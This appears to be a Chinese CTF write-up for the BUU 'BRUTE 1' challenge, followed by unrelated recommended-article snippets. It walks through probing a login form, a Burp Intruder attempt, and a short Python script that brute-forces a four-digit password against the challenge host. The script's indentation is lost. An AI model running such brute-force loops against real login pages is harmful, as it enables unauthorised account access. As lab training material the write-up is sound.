程序地带

逗比学CTF.day3


BUU BRUTE 1

这是提到暴力破解的题目


一、原题截图(没源码)

在这里插入图片描述 看题目比较简单


首先进行简单的测试

用户名输入:admin 密码输入:admin123 在这里插入图片描述 提交后提示密码错误 在这里插入图片描述 再次测试 用户名输入:1234 密码输入:1234 提交后提示用户名错误 在这里插入图片描述 这里说明用户名是admin,密码是4位数字


简单明了,直接暴力测试
二、首先想到BP的测试器

这里推一篇大佬的文章,BP测试器爆破方式将的非常明白 链接: https://blog.csdn.net/qq_26406447/article/details/89464125.


我使用的是Cluster Bomb

穷举所有能的组合 在这里插入图片描述 再password参数设置4个爆破量,分别为数字0-9 在这里插入图片描述 总共攻击10000次,但是不知道是我bp的问题,还是电脑的问题,或者攻击过快,导致很多请求返回值为429,让我很头疼,没有找到正确答案 在这里插入图片描述


三、然后就想到了使用python写脚本破解
# -*- coding: utf-8 -*-
# python版本为3.8
import requests
for a in range(10):
for b in range(10):
for c in range(10):
for d in range(10):
s = '%d%d%d%d' % (a, b, c, d)
print(s)
rr = requests.get(
'http://bc5e1cca-f1c1-497a-abfb-be56d37ed00d.node3.buuoj.cn/?username=admin&password=%s' % s).text
if not ('密码错误' in rr):
print(rr)
exit()

爆破成功,得到flag


在这里插入图片描述


版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45963786/article/details/112689316

随机推荐

Android常见问题记录

AndroidR模拟器调用第三方应用的Activity会奔溃,在Manifast中已配置且exported=true的情况下。测试Android6.0和Android10.0均无报错。目前没找...

Squirrel桓 阅读(667)

2021-01-15

MES系统应用五级成熟度模型结合企业应用MES系统的过程,总结了MES系统应用的五级成熟度模型。工具/原料mes系统五级一、初始级初步实现生产现场的闭环管理,建立围绕以生产...

thre3stone 阅读(780)